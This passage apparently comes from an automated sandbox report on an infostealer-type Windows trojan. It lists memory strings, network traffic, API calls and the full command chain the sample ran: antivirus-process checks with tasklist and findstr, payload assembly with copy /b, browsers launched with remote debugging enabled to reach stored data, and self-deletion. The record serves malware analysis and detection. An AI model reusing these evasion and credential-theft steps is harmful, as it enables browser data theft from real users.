    Source: chrome.exe, 00000011.00000003.2819523469.000025980180C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
    Source: chrome.exe, 00000011.00000003.2819523469.000025980180C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager23
    Source: chrome.exe, 00000011.00000003.2804100647.00002598002A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
    Source: chrome.exe, 00000011.00000003.2804100647.00002598002A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
    Source: chrome.exe, 00000011.00000003.2815198308.0000259801460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
    Source: chrome.exe, 00000011.00000003.2814373758.0000259801368000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2808332227.0000259801368000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2810075272.0000259801450000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2814425177.0000259801384000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2814271540.00002598013B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2815198308.0000259801460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
    Source: chrome.exe, 00000011.00000003.2814425177.0000259801384000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2815198308.0000259801460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.otmEBJ358uU.2019.O/rt=j/m=q_dnp
    Source: chrome.exe, 00000011.00000003.2814425177.0000259801384000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2815198308.0000259801460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://www.iheart.com/podcast/
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://www.instagram.com
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://www.last.fm/
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://www.messenger.com
    Source: 2cc80dabc69f58b6_1.23.drString found in binary or memory: https://www.msn.com/web-notification-icon-light.png
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&game
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&item
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&item=fl
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&playInS
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://www.office.com
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://www.officeplus.cn/?sid=shoreline&endpoint=OPPC&source=OPCNshoreline
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=1
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=2
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=1
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=2
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://www.tiktok.com/
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://www.youtube.com
    Source: chrome.exe, 00000011.00000003.2784272725.000025980099C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/:
    Source: chrome.exe, 00000011.00000003.2784272725.000025980099C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytca
    Source: chrome.exe, 00000011.00000003.2784272725.000025980099C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J
    Source: chrome.exe, 00000011.00000003.2819894241.000025980129C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2784272725.000025980099C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
    Source: chrome.exe, 00000011.00000003.2819894241.000025980129C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmllt
    Source: 4affd74f-d513-4497-b936-b9389fe7cc84.tmp.23.drString found in binary or memory: https://y.music.163.com/m/
    Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50122 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
    Source: unknownNetwork traffic detected: HTTP traffic on port 50116 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
    Source: unknownNetwork traffic detected: HTTP traffic on port 50059 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50094 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50059
    Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50125 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50064
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
    Source: unknownNetwork traffic detected: HTTP traffic on port 50113 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
    Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50134 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50074
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
    Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50116
    Source: unknownNetwork traffic detected: HTTP traffic on port 50120 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50119
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50118
    Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50078
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50111
    Source: unknownNetwork traffic detected: HTTP traffic on port 50114 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50113
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50079
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50112
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50115
    Source: unknownNetwork traffic detected: HTTP traffic on port 50096 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50114
    Source: unknownNetwork traffic detected: HTTP traffic on port 50133 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50081
    Source: unknownNetwork traffic detected: HTTP traffic on port 50073 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50080
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50083
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50082
    Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50043 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
    Source: unknownNetwork traffic detected: HTTP traffic on port 50119 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50120
    Source: unknownNetwork traffic detected: HTTP traffic on port 50054 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50122
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50121
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50124
    Source: unknownNetwork traffic detected: HTTP traffic on port 50111 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50123
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50126
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
    Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50125
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50094
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50096
    Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50082 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50065 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50133
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50132
    Source: unknownNetwork traffic detected: HTTP traffic on port 50112 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50135
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50134
    Source: unknownNetwork traffic detected: HTTP traffic on port 50078 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
    Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50135 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50064 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50123 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
    Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50124 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50118 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50019 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50066 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50083 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
    Source: unknownNetwork traffic detected: HTTP traffic on port 50121 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
    Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
    Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
    Source: unknownNetwork traffic detected: HTTP traffic on port 50115 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50132 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50126 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49993 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
    Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49715 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49752 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49866 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49988 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 116.203.14.4:443 -> 192.168.2.5:49989 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:49994 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:50124 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.5:50135 version: TLS 1.2
    Source: C:\Users\user\Desktop\6684V5n83w.exeCode function: 0_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050CD
    Source: C:\Users\user\Desktop\6684V5n83w.exeCode function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044A5
    Source: C:\Users\user\Desktop\6684V5n83w.exeCode function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,0_2_00403883
    Source: C:\Users\user\Desktop\6684V5n83w.exeFile created: C:\Windows\QuotedEmilyJump to behavior
    Source: C:\Users\user\Desktop\6684V5n83w.exeFile created: C:\Windows\PopeDatingJump to behavior
    Source: C:\Users\user\Desktop\6684V5n83w.exeFile created: C:\Windows\CmArriveJump to behavior
    Source: C:\Users\user\Desktop\6684V5n83w.exeCode function: 0_2_0040497C0_2_0040497C
    Source: C:\Users\user\Desktop\6684V5n83w.exeCode function: 0_2_00406ED20_2_00406ED2
    Source: C:\Users\user\Desktop\6684V5n83w.exeCode function: 0_2_004074BB0_2_004074BB
    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
    Source: C:\Users\user\Desktop\6684V5n83w.exeCode function: String function: 004062A3 appears 58 times
    Source: 6684V5n83w.exeStatic PE information: invalid certificate
    Source: 6684V5n83w.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@91/294@29/19
    Source: C:\Users\user\Desktop\6684V5n83w.exeCode function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044A5
    Source: C:\Users\user\Desktop\6684V5n83w.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
    Source: C:\Users\user\Desktop\6684V5n83w.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\FocusedJump to behavior
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4844:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1788:120:WilError_03
    Source: C:\Users\user\Desktop\6684V5n83w.exeFile created: C:\Users\user\AppData\Local\Temp\nsm2D78.tmpJump to behavior
    Source: 6684V5n83w.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
    Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
    Source: C:\Users\user\Desktop\6684V5n83w.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\6684V5n83w.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: srq16pzmy.13.dr, gd2vasr16.13.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
    Source: 6684V5n83w.exeReversingLabs: Detection: 23%
    Source: C:\Users\user\Desktop\6684V5n83w.exeFile read: C:\Users\user\Desktop\6684V5n83w.exeJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\6684V5n83w.exe "C:\Users\user\Desktop\6684V5n83w.exe"
    Source: C:\Users\user\Desktop\6684V5n83w.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Focused Focused.cmd & Focused.cmd
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 330775
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Modules
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "however" Hotel
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 330775\Evans.com + Presentation + Univ + Gmc + Underground + Rd + Burns + Riders + Dp + Finish + Entities + Cleveland 330775\Evans.com
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Delivering + ..\Wisdom + ..\Spare + ..\Earrings + ..\Grey + ..\Bus + ..\Project l
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com Evans.com l
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2388 --field-trial-handle=2068,i,3099484482751593606,10427139142014003377,262144 /prefetch:8
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2692 --field-trial-handle=2548,i,2148176420882130604,12860696726209298526,262144 /prefetch:3
    Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2192 --field-trial-handle=2012,i,13447073896792857968,5768153646567357744,262144 /prefetch:3
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6860 --field-trial-handle=2012,i,13447073896792857968,5768153646567357744,262144 /prefetch:8
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7024 --field-trial-handle=2012,i,13447073896792857968,5768153646567357744,262144 /prefetch:8
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com" & rd /s /q "C:\ProgramData\kno8y" & exit
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
    Source: C:\Users\user\Desktop\6684V5n83w.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Focused Focused.cmd & Focused.cmdJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 330775Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E ModulesJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "however" Hotel Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 330775\Evans.com + Presentation + Univ + Gmc + Underground + Rd + Burns + Riders + Dp + Finish + Entities + Cleveland 330775\Evans.comJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Delivering + ..\Wisdom + ..\Spare + ..\Earrings + ..\Grey + ..\Bus + ..\Project lJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com Evans.com lJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com" & rd /s /q "C:\ProgramData\kno8y" & exitJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
